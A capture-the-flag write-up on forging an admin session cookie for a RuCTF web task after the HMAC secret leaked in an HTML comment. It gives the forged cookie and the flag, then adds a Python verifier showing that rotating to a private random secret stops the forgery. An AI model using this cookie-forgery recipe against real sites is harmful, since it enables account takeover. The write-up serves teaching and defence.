The service is running at http://w2.quals.ructf.org/.
The page has an authorization form and another form with strange functionality. There is also a registration link.
First we registered a new user with 1 / 1 as login / password. We saw that the server set a cookie:
Cookie: mojolicious=eyJuYW1lIjoiMSIsImV4cGlyZXMiOjEzOTUwNjI3OTh9--b844d3ef12af172ffebe4271f93d0548b92f637d
The first part, before "--", is the base64-encoded user session information:
'eyJuYW1lIjoiMSIsImV4cGlyZXMiOjEzOTUwNjI3OTh9' == base64('{"name":"1","expires":1395062798}')
The second part, after "--", is hash_hmac with sha1 of the first part with a secret. We found the secret in the page source code:
<!-- secret: ructf -->
So we assumed that we needed to get admin's cookie. We replaced our nickname with 'admin' and generated a new cookie with the help of http://www.freeformatter.com/hmac-generator.html:
part1 = base64('{"name":"admin","expires":1395062798}')
part2 = hash_hmac('sha1', part1, 'ructf')
Result:
part1 + '--' + part2 == 'eyJuYW1lIjoiYWRtaW4iLCJleHBpcmVzIjoxMzk1MDYyNzk4fQ==--f0b9d2795f0e8de1abafede4ea2aae54282e09a9'
So we logged in with the new admin cookie and saw the message 'Hi, admin!'. Then we went to http://w2.quals.ructf.org/list and got the flag 054ad7a734437d6853383ad919526dc5 by following the http://w2.quals.ructf.org/very/super/secret/flag link.
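Why the leaked secret was enough, and what fixes it, as an added example that is not code from the task or from Mojolicious: a verifier for the "value--hmac" cookie layout described above, showing that any cookie built with the published secret passes the check until the secret is rotated to a random server-side value. The function names, the rotated secret and the clock value are assumptions made for the illustration.

```python
import base64, hashlib, hmac, json, secrets

def _mac(value: str, secret: bytes) -> str:
    return hmac.new(secret, value.encode(), hashlib.sha1).hexdigest()

def make_cookie(session: dict, secret: bytes) -> str:
    """Build 'base64(json)--hmac_sha1' in the layout shown in the write-up."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    value = base64.b64encode(raw).decode()
    return value + "--" + _mac(value, secret)

def verify(cookie: str, accepted_secrets: list, now: int):
    """Return the session dict, or None when the MAC or the expiry check fails."""
    value, sep, mac = cookie.rpartition("--")
    if not sep:
        return None
    # Constant-time comparison; each accepted secret is tried (allows rotation).
    if not any(hmac.compare_digest(_mac(value, s).encode(), mac.encode())
               for s in accepted_secrets):
        return None
    try:
        session = json.loads(base64.b64decode(value + "=" * (-len(value) % 4)))
    except ValueError:
        return None
    expires = session.get("expires") if isinstance(session, dict) else None
    if not isinstance(expires, int) or expires <= now:
        return None
    return session

LEAKED = b"ructf"                  # the secret exposed in the page's HTML comment
ROTATED = secrets.token_bytes(32)  # constructed replacement, kept on the server only
NOW = 1395060000                   # constructed clock value, before the cookie expiry

def demo() -> dict:
    # A cookie built outside the server, using only the published secret.
    outside = make_cookie({"name": "admin", "expires": 1395062798}, LEAKED)
    issued = make_cookie({"name": "1", "expires": 1395062798}, ROTATED)
    # Payload changed to "admin" while reusing the MAC of the issued cookie.
    tampered = outside.split("--")[0] + "--" + issued.split("--")[1]
    return {
        "leaked_secret": verify(outside, [LEAKED], NOW),    # accepted as admin
        "after_rotation": verify(outside, [ROTATED], NOW),  # None
        "issued": verify(issued, [ROTATED], NOW),           # accepted as user 1
        "tampered": verify(tampered, [ROTATED], NOW),       # None
        "expired": verify(issued, [ROTATED], 1395062799),   # None
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:15} {result}")
```

The HMAC only protects the session while the key stays private, so the fix is a random secret that is never sent to the client, not a change to the cookie format.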